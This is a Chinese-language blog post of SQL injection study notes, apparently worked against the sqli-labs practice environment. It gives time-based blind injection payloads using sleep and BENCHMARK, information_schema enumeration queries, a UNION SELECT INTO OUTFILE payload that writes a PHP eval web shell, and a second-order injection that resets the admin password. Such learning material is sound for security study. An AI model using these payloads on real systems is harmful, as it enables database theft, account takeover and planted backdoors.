首页 > 数据库技术 > 详细

sql注入学习笔记4

时间:2018-01-13 12:04:00      阅读:238      评论:0      收藏:0      [点我收藏+]

延时注入,延时注入每种数据库都有不同的延时函数

and If(ascii(substr(database(),1,1))=105,1,sleep(5))--+

这是mysql的延时注入,当ascii(substr(database(),1,1))=105为真时返回1,为假则执行sleep(5),将会有5秒的延时报错

重复执行指定操作的函数

BENCHMARK(count,expr)函数将表达式expr重复执行count,然后返回执行时间。该函数可以用来判断MySQL处理表达式的速度。

UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE(‘MSG‘,‘by 5 seconds‘)),null)),2,3 FROM (select database() as current) as tb1--+

1 truncvalue,precision)按精度(precision)截取某个数字,不进行舍入操作。
2 roundvalue,precision)根据给定的精度(precision)输入数值。
3 ceil (value) 产生大于或等于指定值(value)的最小整数。
4 floorvalue)与 ceil()相反,产生小于或等于指定值(value)的最小整数。
5 sign(value) 与绝对值函数ABS()相反。ABS()给出的是值的量而不是其符号,sign(value)则给出值的符号而不是量。

这是截断字符串常用函数的详解 http://www.cnblogs.com/lcamry/p/5504374.html

这是盲注一些解释  http://www.cnblogs.com/lcamry/p/5763129.html 

Mysql 文件导入导出 http://www.cnblogs.com/lcamry/p/5763111.html

Loadfile常用路径  http://www.cnblogs.com/lcamry/p/5729087.html

UNION SELECT 1,2,‘<?php @eval($_post["mima"])?>‘ into outfile "c:\\wamp\\www\\sqllib\\Less-7\\yijuhua.php"--+  

导入一句话木马,前提是有权限,导入后就可以用cknife连接

实验吧的一个实验  http://jxust.shiyanbar.com/course/50978/vid/1502

 

mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。

下列字符受影响:

  • \x00
  • \n
  • \r
  • \
  • "
  • \x1a

获取数据库名

Select schema_name from information_schema.schemata

获取表名

Select table_name from information_schema.tables from where

table_name=’schema_name’

获取列名

Select column_name from information_schema.columns where table_name=’table_name’

获取内容

Select ‘column_name’from schema_name.table_name

SqlilabsLess-24关体验了下二次注入

先注册创建了个admin’#的账户,密码是123

 技术分享图片

 

 技术分享图片

 

可以进行更改密码的操作,更改密码时,将会发生二次注入,因为#将查询更新后面内容注释了

技术分享图片

 

可以看见通过改admin’#用户的密码,结果更改了admin的密码,这时我们就可以通过自己设置的密码登录管理员账户了,还一个和这有同样效果的是sql约束攻击,也能变相登录管理员密码,而不需要原来的管理员密码,当然管理员账户是需要知道的

 

 

sql注入学习笔记4

原文:https://www.cnblogs.com/GH-D/p/8278584.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!